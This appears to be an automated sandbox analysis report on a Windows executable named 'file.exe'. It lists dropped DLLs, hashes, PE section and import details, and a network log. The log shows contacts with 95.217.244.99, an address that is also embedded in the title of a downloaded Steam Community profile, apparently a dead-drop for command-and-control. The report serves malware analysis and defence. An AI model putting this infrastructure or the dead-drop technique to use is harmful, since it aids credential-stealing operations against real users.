                                                                                                                                                                                                                                      MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                      SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                      SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                      SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):33800
                                                                                                                                                                                                                                      Entropy (8bit):5.4355085048118585
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:kqdpqm+0Iz3YAA9CWGjSvtfcDAgZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKM:3d8m+0Iz3YAA9CWGjqFgZ4VWBCW3KI8s
                                                                                                                                                                                                                                      MD5:6C66541D68DED8BDE1AF3A21D9314EF3
                                                                                                                                                                                                                                      SHA1:879ED8B8206C53BFA2B5814D444BD7B820F54306
                                                                                                                                                                                                                                      SHA-256:BF01C6ED6D7947B1AEEAE24021D2C1C86623668CC7BCB9ACD31AFD1FB4EBD9F0
                                                                                                                                                                                                                                      SHA-512:FB4F6D9B9C44F3B19FC82D2C0EAE5F5AA1C434D1C90EA56CA8CF279703BA097EA8885314C2ED561A4A3CC60C6C807266CBDEC9FFD3041D38FCCA84F351D1C41C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://95.217.244.99|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.468449502596563
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:XzZfpi6ceLPx9skLmb0fCZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5SX:DZHtCZWOKnMM6bFp9j4X
                                                                                                                                                                                                                                      MD5:D5A0E9AD072A6180752214234D002D53
                                                                                                                                                                                                                                      SHA1:E9C7F529E0D555CD0ABBF42235034E53A296D450
                                                                                                                                                                                                                                      SHA-256:33A91F9B262B1459384817B1E295289AF1E6EB1803C1F11E0D8663E3C0A3B599
                                                                                                                                                                                                                                      SHA-512:D67882CFDAD2EF31D03D11A4A7A67E3FEB2D02C035F99665677E68A548E2D6DF1755F09B502B46BE944E98BA365B127062FB2331AF03620F33AAD8B75F30ADFE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmjA..................................................................................................................................................................................................................................................................................................................................................z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):6.3528127473226785
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                                                      File size:1'135'104 bytes
                                                                                                                                                                                                                                      MD5:c7cb10eadcca31c88538f972fd657590
                                                                                                                                                                                                                                      SHA1:9b09cdc280601e63579ae2cb64d863a0419d971c
                                                                                                                                                                                                                                      SHA256:fabac53ffc7381edddcaddca2c9b2d647dd30a2e66d62c3cca720349f1e66d4e
                                                                                                                                                                                                                                      SHA512:9d8efe2b42c5cc99fdc807a9b3d6628c39825b257aef9e81d4b9396b5d3b730307478c047764631fc6b646895c7e92052326dff6e1740fd2ba4eef7904224bd6
                                                                                                                                                                                                                                      SSDEEP:24576:f26YE2EStbC19xq1a9GeWTaaQgUkSMnHJa:fHp19xq1a9QQMHJa
                                                                                                                                                                                                                                      TLSH:EA35AF3139C49171EEE220B743ECFA3A866DE0B0071556CF56D85AEED7206C27F32696
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B............C.......C...9...C.......R!......R!......C...............R!......c"......c"......Rich....................PE..L..
                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                      Entrypoint:0x4011d6
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x6627F55A [Tue Apr 23 17:52:26 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:5822c854edef0b68a31f6b397cb24414
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      jmp 00007FEED9463795h
                                                                                                                                                                                                                                      jmp 00007FEED947CCB3h
                                                                                                                                                                                                                                      jmp 00007FEED9462D26h
                                                                                                                                                                                                                                      jmp 00007FEED946BD2Bh
                                                                                                                                                                                                                                      jmp 00007FEED9456AF2h
                                                                                                                                                                                                                                      jmp 00007FEED9438B31h
                                                                                                                                                                                                                                      jmp 00007FEED94C3DBCh
                                                                                                                                                                                                                                      jmp 00007FEED9456FEEh
                                                                                                                                                                                                                                      jmp 00007FEED947DA73h
                                                                                                                                                                                                                                      jmp 00007FEED94CB516h
                                                                                                                                                                                                                                      jmp 00007FEED943F6D5h
                                                                                                                                                                                                                                      jmp 00007FEED94648DBh
                                                                                                                                                                                                                                      jmp 00007FEED943E38Ch
                                                                                                                                                                                                                                      jmp 00007FEED9474858h
                                                                                                                                                                                                                                      jmp 00007FEED944FEEDh
                                                                                                                                                                                                                                      jmp 00007FEED9433B4Fh
                                                                                                                                                                                                                                      jmp 00007FEED949A659h
                                                                                                                                                                                                                                      jmp 00007FEED943D3EBh
                                                                                                                                                                                                                                      jmp 00007FEED9433130h
                                                                                                                                                                                                                                      jmp 00007FEED94B8BB4h
                                                                                                                                                                                                                                      jmp 00007FEED94332E6h
                                                                                                                                                                                                                                      jmp 00007FEED94781BFh
                                                                                                                                                                                                                                      jmp 00007FEED9494C0Dh
                                                                                                                                                                                                                                      jmp 00007FEED9453D9Eh
                                                                                                                                                                                                                                      jmp 00007FEED9486255h
                                                                                                                                                                                                                                      jmp 00007FEED945E4BAh
                                                                                                                                                                                                                                      jmp 00007FEED946C8F0h
                                                                                                                                                                                                                                      jmp 00007FEED9436CE3h
                                                                                                                                                                                                                                      jmp 00007FEED9490A1Ch
                                                                                                                                                                                                                                      jmp 00007FEED94C6B20h
                                                                                                                                                                                                                                      jmp 00007FEED944E24Dh
                                                                                                                                                                                                                                      jmp 00007FEED9464D43h
                                                                                                                                                                                                                                      jmp 00007FEED949A61Fh
                                                                                                                                                                                                                                      jmp 00007FEED94C10AAh
                                                                                                                                                                                                                                      jmp 00007FEED94B31C2h
                                                                                                                                                                                                                                      jmp 00007FEED94AD755h
                                                                                                                                                                                                                                      jmp 00007FEED94503E2h
                                                                                                                                                                                                                                      jmp 00007FEED946C80Dh
                                                                                                                                                                                                                                      jmp 00007FEED9485A34h
                                                                                                                                                                                                                                      jmp 00007FEED9485A1Bh
                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1122300x50.idata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000x49b0.reloc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc6d300x38.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc6c480x40.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1120000x230.idata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000xb86a10xb88006a7ff7ac5bb6031b8ac6fa2065774774False0.3300966505758808data5.80913579150109IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0xba0000x14d200x14e001dd46cd5806aaec22e69631cae5111cbFalse0.2869924214071856data3.7005670159036304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0xcf0000x42be80x410005e6bc803e68e630d83e0a62d97d40250False0.8082557091346154data7.2104998343976305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .idata0x1120000xd2a0xe00d909f99d190ed51087ee9eaa1a3ac979False0.33705357142857145dBase III DBT, version number 0, next free block index 1123504, 1st item "\330$\021"4.446610566492018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .00cfg0x1130000x10e0x200883e59e697a12b05d2e5f5b8b4904140False0.03515625data0.11055713125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .reloc0x1140000x56b20x580059e0133c856eec43465830f270aa49a2False0.6329456676136364data6.036515098733131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      ADVAPI32.dllRegEnableReflectionKey
                                                                                                                                                                                                                                      SHELL32.dllDragFinish
                                                                                                                                                                                                                                      KERNEL32.dllCreateFileW, HeapSize, VirtualProtectEx, FormatMessageA, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, LocalFree, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, GetProcessHeap, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetCurrentThread, HeapAlloc, HeapFree, GetFileType, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, SetConsoleCtrlHandler, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.812483072 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.812509060 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.812576056 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.825474024 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.825489044 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.067856073 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.067967892 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.294295073 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.294320107 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.294620037 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.294684887 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.308804035 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.356112957 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584300995 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584330082 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584347010 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584378958 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584393978 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.584474087 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703552008 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703609943 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703680992 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703711987 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703739882 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.703753948 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.723917961 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724031925 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724037886 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724085093 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724132061 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724184036 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724652052 CEST49699443192.168.2.623.47.27.74
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.724667072 CEST4434969923.47.27.74192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.751919031 CEST49701443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.751981974 CEST4434970195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:56.752067089 CEST49701443192.168.2.695.217.244.99
